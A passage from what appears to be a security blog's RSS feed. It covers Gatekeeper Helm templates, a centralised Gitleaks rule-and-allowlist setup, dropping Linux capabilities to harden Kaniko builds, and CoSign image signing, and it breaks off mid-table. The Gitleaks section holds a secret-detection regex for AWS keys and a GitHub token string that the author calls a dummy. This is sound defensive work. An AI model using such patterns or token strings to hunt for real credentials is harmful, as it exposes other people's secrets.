    {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">for</span> <span class="hljs-string">globalimport</span> <span class="hljs-string">include</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"includeNamespacesDefaultFlag"</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.includeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.includeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">else</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.globalImport.includeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.includeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.includeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">excludeNamespaces</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">or</span> <span class="hljs-string">(.Values.K8sPSPForbiddenSysctls.excludeNamespaces)</span> <span class="hljs-string">(hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"excludeNamespacesDefaultFlag"</span><span class="hljs-string">)</span>}}
    <span class="hljs-attr">excludedNamespaces:</span>
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">for</span> <span class="hljs-string">globalimport</span> <span class="hljs-string">include</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"excludeNamespacesDefaultFlag"</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.excludeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.excludeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">else</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.globalImport.excludeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.excludeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.excludeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">scope</span> <span class="hljs-string">is</span> <span class="hljs-string">defined</span> <span class="hljs-string">(Cluster/Namespace)</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.scope</span>}}
    <span class="hljs-attr">scope:</span> {{<span class="hljs-string">.Values.K8sPSPForbiddenSysctls.scope</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">custom</span> <span class="hljs-string">values</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.parameters</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.parameters.forbiddenSysctls</span>}}
  <span class="hljs-attr">parameters:</span>
    <span class="hljs-attr">forbiddenSysctls:</span>
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.parameters.forbiddenSysctls</span>}}
    <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
  {{<span class="hljs-string">end</span>}}
  {{<span class="hljs-string">end</span>}}
  {{<span class="hljs-string">end</span>}}
{{<span class="hljs-bullet">-</span> <span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
</code></pre>
<h2 id="heading-installation">Installation</h2>
<ol>
<li><p>Clone https://github.com/rewanthtammana/gatekeeper-rules-helm-library</p>
</li>
<li><p>Create all CRDs. The CRDs are available in <code>./crds</code> folder. <code>bash kubectl create -f ./crds/general/ kubectl create -f ./crds/pod-security-policy/</code></p>
</li>
<li><p>Install the templates. The <code>values.yaml</code> can be tweaked to adjust template values. <code>bash helm install rules-helm .</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655545082235/4y4qpJygR.png" alt="image.png" /></p>
</li>
</ol>
<h2 id="heading-conclusion">Conclusion</h2>
<p>This kind of structuring allows simple management with Gatekeeper rules &amp; allows the rules library for easy extension. Separate <code>values.yaml</code> can be created. For example, <code>psp-values.yaml</code> with PSP template values, <code>general-values.yaml</code> with the general template values, etc. removing the complexity from the operations team.</p>
<h2 id="heading-references">References</h2>
<p><a target="_blank" href="https://github.com/rewanthtammana/gatekeeper-helm-library">https://github.com/rewanthtammana/gatekeeper-helm-library</a></p>
<p><a target="_blank" href="https://github.com/open-policy-agent/gatekeeper-library">https://github.com/open-policy-agent/gatekeeper-library</a></p>
<h2 id="heading-authors">Authors</h2>
<p><a target="_blank" href="https://www.linkedin.com/in/siddharthtanna/">Siddharth Tanna</a></p>
<p><a target="_blank" href="https://www.linkedin.com/in/rewanthtammana">Rewanth Tammana</a></p>
]]></content:encoded></item><item><title><![CDATA[Gitleaks For Enterprises]]></title><description><![CDATA[The default configuration of Gitleaks isn't feasible to use across multiple projects for teams/organizations. In this article, we will understand the need for having a secret scanning tool in your environment, a quick intro on challenges with default...]]></description><link>https://blog.rewanthtammana.com/gitleaks-for-enterprises</link><guid isPermaLink="true">https://blog.rewanthtammana.com/gitleaks-for-enterprises</guid><category><![CDATA[Security]]></category><category><![CDATA[software architecture]]></category><category><![CDATA[Python 3]]></category><category><![CDATA[automation]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sat, 28 May 2022 19:00:49 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1653123265587/U21J3InBo.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The default configuration of Gitleaks isn't feasible to use across multiple projects for teams/organizations. In this article, we will understand the need for having a secret scanning tool in your environment, a quick intro on challenges with default Gitleaks configuration when we try to use it in enterprises/across projects &amp; how we can fix it. </p>
<p><strong>Github:</strong> <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-for-enterprise">gitleaks-for-enterprise</a></p>
<h3 id="heading-introduction">Introduction</h3>
<p>Most of the recent security breaches occur due to a simple misconfiguration or leaked secrets/API keys/etc. Detecting these kinds of misconfigurations at an early stage in the build process will be pretty helpful. Identifying secrets &amp; sensitive information plays a key role in the shift-left security DevOps approach.</p>
<h3 id="heading-about-gitleaks">About Gitleaks</h3>
<p><a target="_blank" href="https://github.com/zricethezav/gitleaks">Gitleaks</a> is a SAST tool for detecting and preventing hardcoded secrets like passwords, API keys, and tokens in git repos. Gitleaks is an easy-to-use, all-in-one solution for detecting secrets, past or present, in your code.</p>
<h3 id="heading-usage">Usage</h3>
<pre><code class="lang-bash">gitleaks detect -c ./gitleaks.toml --<span class="hljs-built_in">source</span> /path/to/repo
</code></pre>
<pre><code class="lang-bash">$ cat gitleaks.toml
...
[[rules]]
    description = <span class="hljs-string">"Rule 1: AWS Access Key"</span>
    regex = <span class="hljs-string">''</span><span class="hljs-string">'(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'</span><span class="hljs-string">''</span>
    tags = [<span class="hljs-string">"key"</span>, <span class="hljs-string">"AWS"</span>]
...
</code></pre>
<p>The best part with Gitleaks is it allows us to add <code>allowlist</code> based on <code>rule</code> &amp; <code>commitID</code>/<code>fileName</code>/<code>data</code>/ etc. This will be helpful while dealing with false positives.</p>
<pre><code class="lang-bash">$ cat gitleaks-with-allowlist.toml
...
[[rules]]
    description = <span class="hljs-string">"Rule 1: AWS Access Key"</span>
    regex = <span class="hljs-string">''</span><span class="hljs-string">'(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'</span><span class="hljs-string">''</span>
    tags = [<span class="hljs-string">"key"</span>, <span class="hljs-string">"AWS"</span>]
    [rules.allowlist]
    description = <span class="hljs-string">"Ignore revoked AWS Key"</span>
    commits = [ <span class="hljs-string">"commit-A"</span> ]
    paths = [ <span class="hljs-string">''</span><span class="hljs-string">'config.env'</span><span class="hljs-string">''</span> ]
...
</code></pre>
<p>There are multiple ways to integrate Gitleaks into your environment like pre-commit hooks, CI pipelines, etc. That's an amazing feature.</p>
<p>Everything looks great. Where is the problem?</p>
<h3 id="heading-existing-architecture-andamp-drawbacks">Existing architecture &amp; drawbacks</h3>
<p>If you want to run Gitleaks on 2-3 projects, it's straightforward. But things get quite challenging &amp; interesting when we want to integrate it into larger organizations with tens/hundreds of projects. Why?</p>
<ol>
<li>The default structure of <code>gitleaks.toml</code> makes it impossible to use it across multiple projects</li>
<li>The whitelisting of false positives across multiple projects can be a real challenge</li>
<li>Having a separate <code>gitleaks.toml</code> for each project isn't a feasible solution either. Why? For instance, you have 100 repositories with individual <code>gitleaks.toml</code> file. You can add the whitelisting in each file specific to the project but when you want to add a new detection rule to <code>gitleaks.toml</code> file, it's gonna be a nightmare to add/delete the values across multiple repositories.</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1652714624519/7Tl6T_k-D.png" alt="Gitleaks-Default-Design.drawio.png" /></p>
<p>The existing structure of <code>gitleaks.toml</code> doesn't give us the flexibility to achieve it. What now?</p>
<h3 id="heading-upgraded-architectural-design">Upgraded architectural design</h3>
<p>We should build a design that's flexible &amp; open to extension with ease. What do we need?</p>
<ol>
<li>Centralized repository for detection rules &amp; exceptions</li>
<li>All secret detection rules <strong>must be</strong> in a single file</li>
<li>The exceptions are different for every project. The constraints of a rule being an exception varies for every project. Hence, the allowlist rules for each project should be stored in separate files.</li>
<li>A connector that will combine the detection rules &amp; exception list in a way that <code>gitleaks</code> can understand.</li>
<li>Run <code>gitleaks</code> on the specific repository along with the data gathered above.</li>
</ol>
<p>The design looks something like this.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1652714633471/wZ4day3ry.png" alt="Gitleaks-For-Enterprises-Design.drawio.png" /></p>
<h3 id="heading-how-to-configure-andamp-use-it">How to configure &amp; use it</h3>
<ol>
<li>Check the <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-for-enterprise">gitleaks-for-enterprise</a> repository. The directory structure is as follows - <code>allowlist/$USERNAME/$REPONAME/allowlist.toml</code>
 <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653063995509/MXdgcvtBO.png" alt="Show-Allowlist-Directory-Structure.png" /></li>
<li>Next step is to clone <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-for-enterprise">gitleaks-for-enterprise</a> &amp; generate <code>gitleaks.toml</code>. We have a <code>base.toml</code> file with all the detection rules. The <code>allowlist</code> folder contains exceptions for all projects.</li>
<li>If this is your first time generating <code>gitleaks.toml</code>, this file would be equivalent to <code>base.toml</code> because there's no <code>allowlist.toml</code> for your target project yet.<pre><code class="lang-bash"> git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/gitleaks-for-enterprise
 <span class="hljs-built_in">cd</span> gitleaks-for-enterprise
 python3 run.py -a allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml &gt; gitleaks.toml
</code></pre>
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653762115959/9RoBodrlZ.png" alt="gitleaks-generation.png" /></li>
<li>For this example, let's run it on a demo repository, <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-demo-repo">gitleaks-demo-repo</a>. Clone this repo locally &amp; run gitleaks on it. There are 6 leaks identified.<pre><code class="lang-bash"> git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/gitleaks-demo-repo /tmp/gitleaks-demo-repo
 gitleaks detect -c ./gitleaks.toml --<span class="hljs-built_in">source</span> /tmp/gitleaks-demo-repo
</code></pre>
 <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653064100802/1mqGKyZNF.png" alt="Gitleaks-First-Run.png" /></li>
<li>Append <code>-v</code> option to the above gitleaks command to view gitleaks information. I have leaked dummy values for demo purposes.<pre><code class="lang-bash"> gitleaks detect -c ./gitleaks.toml --<span class="hljs-built_in">source</span> /tmp/gitleaks-demo-repo -v
</code></pre>
 <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653064192844/t2GqR1ugD.png" alt="Gitleaks-first-output-analysis.png" /></li>
<li>Let's consider we revoked the above-identified Github key, <code>ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX</code>.</li>
<li>After a revocation, you can visit your <code>gitleaks-for-enterprise</code> setup &amp; add this revocation as an exception.<ol>
<li>There are multiple ways to add exceptions based on commit id, value, file name, etc.</li>
</ol>
</li>
<li>In this case, let's take the data as an exception. Here it will be <code>ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX</code></li>
<li>The allowlists should be in the below format for ease of organizing &amp; access control, <code>allowlist/$USERNAME/$REPONAME/allowlist.toml</code></li>
<li><p>In this case, we have to create a file <code>allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml</code> with the following data as an exception.</p>
<pre><code class="lang-toml"><span class="hljs-comment"># Rule specific white listing</span>
<span class="hljs-section">[[rules]]</span>
    <span class="hljs-attr">id</span> = <span class="hljs-string">"8"</span>
    <span class="hljs-section">[rules.allowlist]</span>
        <span class="hljs-attr">regexes</span> = [<span class="hljs-string">'''ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX'''</span>]
</code></pre>
</li>
<li>Now generate a new <code>gitleaks.toml</code> file. This will be different from the base file because now we have an <code>allowlist.toml</code> file that will change the course.<pre><code class="lang-bash">python3 run.py -a allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml &gt; gitleaks.toml
</code></pre>
</li>
<li>As we can see, the number of leaks reduce to 4 from 6. Also, you can see that the Github key we revoked, <code>ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX</code> isn't returned as a finding any further.
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653064255272/qYin5eVlD.png" alt="Github-key-in-allowlist.png" /></li>
<li>Similarly you can add more exceptions specific to your repo, in this case, the repo is <code>rewanthtammana/gitleaks-demo-repo</code>, so we created <code>allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.yaml</code>.</li>
</ol>
<h3 id="heading-further-scope-andamp-conclusion">Further Scope &amp; Conclusion</h3>
<p>This can be easily integrated with CI pipelines to identify the sensitive information &amp; helps to take a step towards shift-left security.</p>
<p>The model is designed to be extensible &amp; efficient. This layout can be easily expanded to hundreds/thousands of projects &amp; still provide you the flexibility to have a centralized repository to maintain all the rules &amp; exceptions.</p>
<p>As we have only <code>base.toml</code> with all the detection rules, it's quite affordable for the teams to update the rules frequently &amp; use them across multiple projects.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>By leveraging this kind of directory structure &amp; framework, any team can have a centralized repository for all their detection rules &amp; exception lists. This makes it easy for developers, DevOps, security, including business teams to use &amp; allows to integrate with CI smoothly. Hope this restructuring helps you with gitleaks integration in your enterprise or across multiple projects.</p>
]]></content:encoded></item><item><title><![CDATA[Hardening Kaniko build process with Linux capabilities]]></title><description><![CDATA[Introduction to Kaniko
Kaniko is a tool to build container images from a Dockerfile, inside a container or Kubernetes cluster. More information on usage, here.
Kaniko doesn't depend on a Docker daemon and executes each command within a Dockerfile com...]]></description><link>https://blog.rewanthtammana.com/hardening-kaniko-build-process-with-linux-capabilities</link><guid isPermaLink="true">https://blog.rewanthtammana.com/hardening-kaniko-build-process-with-linux-capabilities</guid><category><![CDATA[Docker]]></category><category><![CDATA[Build tool]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Developer Tools]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 26 Jan 2022 02:19:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1643164134194/QBqkpFgoO.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction-to-kaniko">Introduction to Kaniko</h2>
<p>Kaniko is a tool to build container images from a Dockerfile, inside a container or Kubernetes cluster. More information on usage, <a target="_blank" href="https://github.com/GoogleContainerTools/kaniko">here</a>.</p>
<p>Kaniko doesn't depend on a Docker daemon and executes each command within a Dockerfile completely in userspace. This enables building container images in environments that can't easily or securely run a Docker daemon, such as a standard Kubernetes cluster.</p>
<p>There are tons of tutorials on <a target="_blank" href="https://github.com/GoogleContainerTools/kaniko/blob/main/docs/tutorial.md">the internet</a> on how to use Kaniko. Rather than focusing on regular usage, we will take things a notch higher by hardening Kaniko build process to ensure better security.</p>
<h2 id="heading-introduction-to-security-concerns">Introduction to security concerns</h2>
<ul>
<li>Kaniko runs as a container to build images</li>
<li>Kaniko runs as an unprivileged container</li>
<li>But that container runs as a root user</li>
</ul>
<p>Running container as a root user is not recommended but here kaniko will be used for building the images (unpacking other images, changing permissions, etc), so kaniko requires a certain level of privileges. Hence, the root user is mandatory.</p>
<h2 id="heading-internal-working">Internal working</h2>
<p>Running container as the root user is a concern when the container is having a wide range of Linux capabilities that can lead to compromise of the host machine. To prevent this attack, we will drop all the capabilities for this kaniko container. But as discussed above, Kaniko requires a specific set of capabilities to perform operations. Let's try to explicitly add those capabilities to Kaniko container, so it will have the ability to build an image.</p>
<p>I have tried building multiple <code>Dockerfiles</code> performing different sets of operations. Post review, I found the following capabilities are required for kaniko to build an image.</p>
<ul>
<li>CHOWN</li>
<li>SETUID</li>
<li>SETGID</li>
<li>FOWNER</li>
<li>DAC_OVERRIDE</li>
</ul>
<h2 id="heading-hands-on-experience">Hands-on experience</h2>
<p>I used a simple <code>Dockerfile</code> for testing.</p>
<pre><code class="lang-Dockerfile">FROM alpine
ENTRYPOINT ["/bin/sh", "-c", "echo hello"]
</code></pre>
<h3 id="heading-default-capabilities-list">Default capabilities list</h3>
<p>Build the image</p>
<pre><code class="lang-bash">docker run --name capdefault -v $(<span class="hljs-built_in">pwd</span>)/Dockerfile:/Dockerfile -v $(<span class="hljs-built_in">pwd</span>):/kaniko-context -it gcr.io/kaniko-project/executor:latest -f /Dockerfile -c /kaniko-context --no-push
</code></pre>
<p>Capture the PID of the above process</p>
<pre><code class="lang-bash">ps -ef | grep capdefault
</code></pre>
<p>Review the bounding set capabilities for that process. <code>CapBnd</code> will help.</p>
<pre><code class="lang-bash">grep Cap /proc/&lt;PID&gt;/status
</code></pre>
<p>Decode the <code>CapBnd</code> value to view the list of capabilities associated with that process.</p>
<pre><code class="lang-bash">capsh --decode=&lt;CapBnd_Value&gt;
</code></pre>
<p>Finally, we can see a wide range of Linux capabilities associated with the container with default settings that can open a gateway to numerous attacks &amp; privilege escalations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642489160412/IPUg9DPGj.png" alt="capdefault-edit.png" /></p>
<h3 id="heading-dropped-all-capabilities">Dropped all capabilities</h3>
<p>Try dropping all the capabilities &amp; building the image.</p>
<pre><code class="lang-bash">docker run --name capdropall --cap-drop=all -v $(<span class="hljs-built_in">pwd</span>)/Dockerfile:/Dockerfile -v $(<span class="hljs-built_in">pwd</span>):/kaniko-context -it gcr.io/kaniko-project/executor:latest -f /Dockerfile -c /kaniko-context --no-push
</code></pre>
<p>When all capabilities are dropped, kaniko won't be able to build an image. </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642489176022/uBSgTmwyr.png" alt="capdropall-edit.png" /></p>
<h3 id="heading-dropped-all-capabilities-andamp-added-only-required-capabilities">Dropped all capabilities &amp; added only required capabilities</h3>
<p>As discussed in the <em>Internal working</em> section, drop all capabilities and add the capabilities that are required only for building images.</p>
<pre><code class="lang-bash">docker run --name capdropsome --cap-drop=all --cap-add CHOWN --cap-add=SETUID --cap-add=SETGID --cap-add=FOWNER --cap-add=DAC_OVERRIDE -v $(<span class="hljs-built_in">pwd</span>)/Dockerfile:/Dockerfile -v $(<span class="hljs-built_in">pwd</span>):/kaniko-context -it gcr.io/kaniko-project/executor:latest -f /Dockerfile -c /kaniko-context --no-push
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642489193456/rvNqwQFBX.png" alt="capdropsome-edit.png" /></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>A wide variety of Dockerfiles should be passed to kaniko as unit tests to understand the required list of capabilities for Kaniko. If we feel any additional privileges are required to build specific Dockerfiles, we can add those capabilities to the Kaniko build container explicitly.</p>
]]></content:encoded></item><item><title><![CDATA[CoSign with Kubernetes: Ensure integrity of images before deployment]]></title><description><![CDATA[During the post-exploitation phase, attackers try to enumerate & exploit systems in stealth mode. With containers, it's very easy to run a malicious service by just changing the image name of any deployment. No SOC/IR team will get an alert for this ...]]></description><link>https://blog.rewanthtammana.com/cosign-with-kubernetes-ensure-integrity-of-images-before-deployment</link><guid isPermaLink="true">https://blog.rewanthtammana.com/cosign-with-kubernetes-ensure-integrity-of-images-before-deployment</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Go Language]]></category><category><![CDATA[Security]]></category><category><![CDATA[Validation]]></category><category><![CDATA[Continuous Integration]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Thu, 13 Jan 2022 17:46:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1642094935164/dIMHq5qQG.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>During the post-exploitation phase, attackers try to enumerate &amp; exploit systems in stealth mode. With containers, it's very easy to run a malicious service by just changing the image name of any deployment. No SOC/IR team will get an alert for this kind of operation as it looks like a regular deployment but it will open a gateway for an innumerous amount of data exfiltration &amp; act as a backdoor.</p>
<p>Hence with cloud &amp; containerized environments ensuring the integrity of the images getting deployed is crucial than ever.</p>
<p><a target="_blank" href="https://github.com/notaryproject/notary">Notary</a> &amp; <a target="_blank" href="https://github.com/sigstore/cosign">CoSign</a> are prominent in the industry for signing &amp; validating the integrity of images.</p>
<p>Thanks to <a target="_blank" href="https://www.giantswarm.io/">GiantSwarm</a> for the <code>ValidatingWebHook</code> boiler template.</p>
<p>TL;DR</p>
<h2 id="heading-high-level-overview">High-level overview</h2>
<ol>
<li>We create a private &amp; public pair (CoSign generates ECDAS-P256 key pair). Use a CI pipeline to perform this operation.</li>
<li>These keys need to be stored in KMS solutions like Hashicorp Vault, AWS KMS, etc.</li>
<li>Image signing happens via CI pipeline.</li>
<li>Private key will be fetched from KMS provider, stored in CI secret store &amp; used for signing of images.</li>
<li>We use the public key pair for validating images.</li>
</ol>
<h3 id="heading-image-repository-snapshot">Image repository snapshot</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642089885561/mXYiSwIIi.png" alt="CoSign-Random-Image-Dockerhub.PNG" /></p>
<h3 id="heading-push-signed-information-to-the-registry">Push signed information to the registry</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642089893644/bdT5N2KEn.png" alt="CoSign-Random-Image-Signature-Pushed.PNG" /></p>
<h3 id="heading-image-repository-snapshot-updated">Image repository snapshot (Updated)</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642089905932/mbjrmBvBC.png" alt="CoSign-Random-Image-Signature-Dockerhub.PNG" /></p>
<h2 id="heading-cosign-workflow">CoSign Workflow</h2>
<p>Deployments can be triggered manually or in an automated fashion by leveraging solutions like <a target="_blank" href="https://argoproj.github.io/">Argo CD</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642080027482/mit1d42M1i.jpeg" alt="CoSign-Workflow.jpg" /></p>
<p>We will be using a <code>ValidatingWebHook</code> to perform integrity validation of images. An admission controller is written in golang to perform this validating operation.</p>
<h2 id="heading-notary-vs-cosign">Notary vs CoSign</h2>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Notary</td><td>CoSign</td></tr>
</thead>
<tbody>
<tr>
<td>Notary uses TUF (The Update Framework) to sign &amp; manage signatures. This framework is quite complex to maintain.</td><td>CoSign doesn't use TUF framework</td></tr>
<tr>
<td>Notary creates multiple keys - root, timestamp, snapshots, targets, delegation, and so on making things further complex.</td><td>Like the TUF framework, there's no structure of different keys. We can of course use the TUF framework with CoSign but that level of complexity isn't required in our environment</td></tr>
<tr>
<td>Notary uses same keys for signing &amp; validation.</td><td>CoSign uses a private key for signing &amp; a public key for validation.</td></tr>
<tr>
<td>There's no direct KMS support for key management making things further complex. This requires a lot of manual effort in securing &amp; rotating the keys.</td><td>KMS support is available for standard providers like GCP, AWS, Hashicorp.</td></tr>
<tr>
<td>Notary requires a separate database for storing the signature data.</td><td>No additional database required. All the image signatures are pushed directly to the registry.</td></tr>
<tr>
<td>HA feature isn't there by default, we need to build solutions for it. We need to build solutions to handle HA/auto-scaling.</td><td>Doesn't require additional hardware to run. It's just a single binary. So no requirement for HA/auto-scaling.</td></tr>
<tr>
<td>We need to ensure the notary server is up &amp; running for seamless integration.</td><td>CoSign connects directly with the image registry, so a health check isn't applicable.</td></tr>
<tr>
<td>Eminently, notary validation is possible only on docker runtime. Most of the environments use containerd and it can't differentiate b/w signed &amp; unsigned images</td><td>Same limitation with container runtime for CoSign</td></tr>
<tr>
<td>Due to the above limitation of validating things at runtime, we have to use Notary client to validate the images. An additional component for maintenance in the future.</td><td>We can use ValidingAdmissionWebhook to achieve image validation.</td></tr>
<tr>
<td>Notary doesn't have RBAC capabilities, allowing anyone to perform privileged operations. To fix this, we have to build Notary from a source with limited capabilities.</td><td>CoSign uses different keys for signing &amp; validation, hence the lack of RBAC capabilities won't be an issue.</td></tr>
<tr>
<td>Synchronizing the signature information between multiple data centers is not practical in real-time.</td><td>Synchronizing the signature data between data centers is very easy.</td></tr>
<tr>
<td>Without signature data duplication, we cannot validate images in other data center deployments. Additionally, we have to distribute multiple keys for image validation across data centers which is a real overhead.</td><td>Since, we have only one public &amp; private key, we can re-use it in different data centers without much hassle.</td></tr>
<tr>
<td>Since pushing &amp; maintaining all the tens of keys across multiple data centers is not feasible, we have to use a different set of keys in each data center for image signing &amp; validation. We have to re-sign the images again &amp; validate them again.</td><td>This is easily achievable with CoSign. All signature information is stored in registries along with images.</td></tr>
<tr>
